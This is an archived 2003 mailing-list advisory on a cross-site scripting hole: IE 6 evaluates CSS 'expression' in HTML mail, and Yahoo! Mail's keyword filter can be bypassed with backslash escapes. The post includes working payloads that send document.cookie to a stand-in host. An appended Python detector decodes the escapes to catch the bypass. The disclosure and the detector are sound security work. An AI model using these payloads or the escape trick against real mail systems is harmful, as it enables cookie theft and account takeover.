
 

Welcome to the Virus.Org Mailing List Archive




[Bugdev] [Full-Disclosure] Webmails (including Yahoo) + IE 6 = XSS

  • To: [EMAIL PROTECTED]
  • Subject: [Bugdev] [Full-Disclosure] Webmails (including Yahoo) + IE 6 = XSS
  • From: Jedi/Sector One <[EMAIL PROTECTED]>
  • Date: Mon, 29 Sep 2003 16:28:24 +0200
  • Reply-to: [EMAIL PROTECTED]
  • Sender: [EMAIL PROTECTED]
 
  Internet Explorer has a useless feature that allows evaluation of
JavaScript expressions in style sheets through the "expression" keyword.

  It allows execution of arbitrary JavaScript as soon as an HTML message is
read in older versions of Outlook and in most webmail systems filtering
<script> tags:

<html>
<body>
<style type="text/css">
h1 {
  height:expression(alert(42));
  background-image:expression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

  Yahoo! mail has a filter against this, that replaces "expression" with
"_expression".

  Unfortunately, this filter is easy to bypass using escaped characters that
are valid CSS and that are properly handled by IE 6.

<html>
<body>
<style type="text/css">
h1 {
  he\ight:e\xpression(alert(42));
  bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

  Workaround until all existing webmail software is fixed (...): disable
JavaScript and/or use any other web browser that focuses on W3C compliance
instead of implementing insecure bloat.

-- 
 __  /*-      Frank DENIS (Jedi/Sector One) <[EMAIL PROTECTED]>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/";> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/";> Misc. free software </a>  \/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Bugdev mailing list
[EMAIL PROTECTED]
http://bugdev.avet.com.pl/
http://www.avet.com.pl/mailman/listinfo/bugdev
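
Added example, not part of the original post and not any webmail vendor's code: a filter-side check that decodes CSS backslash escapes before looking for the "expression" keyword, next to the literal substitution the post describes, to show why the latter misses the escaped form. The function names and the benign sample are constructed for illustration; the decoder also handles hex escapes, which goes beyond the single-character escapes shown in the post.

```python
import re

# CSS 2.1 escape: backslash + 1-6 hex digits (plus one optional whitespace),
# or backslash + any other single character (a newline is a line continuation).
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(\r\n|.))", re.DOTALL)

def css_unescape(css: str) -> str:
    """Return the text as a CSS tokenizer would see it after escape decoding."""
    def decode(m):
        hex_digits, literal = m.group(1), m.group(2)
        if hex_digits is not None:
            cp = int(hex_digits, 16)
            # NUL, surrogates and out-of-range values become U+FFFD
            if cp == 0 or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
                return "\ufffd"
            return chr(cp)
        return "" if literal in "\r\n\f" else literal
    return _CSS_ESCAPE.sub(decode, css)

def naive_filter(css: str) -> str:
    """Literal substitution as described in the post: no decoding first."""
    return css.replace("expression", "_expression")

def uses_expression(css: str) -> bool:
    """Detect the keyword on the decoded, case-folded style text."""
    return re.search(r"expression\s*\(", css_unescape(css).lower()) is not None

def sanitize_style(css: str):
    """Policy assumed here: drop the whole style block instead of rewriting it."""
    return None if uses_expression(css) else css

# Samples: the first two are the declarations quoted in the post,
# the third is a constructed benign rule.
PLAIN = r"h1 { height:expression(alert(42)); }"
ESCAPED = r"h1 { he\ight:e\xpression(alert(42)); }"
BENIGN = r"h1 { height: 42px; background-image: url(http://example.org/bg.png); }"

if __name__ == "__main__":
    for name, css in (("plain", PLAIN), ("escaped", ESCAPED), ("benign", BENIGN)):
        changed = naive_filter(css) != css
        print(f"{name:8} naive filter changed it: {changed!s:5} "
              f"decoded check flags it: {uses_expression(css)}")
```

The same decoding step has to be applied to style="" attributes as well as <style> blocks, since both are parsed by the same CSS tokenizer.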
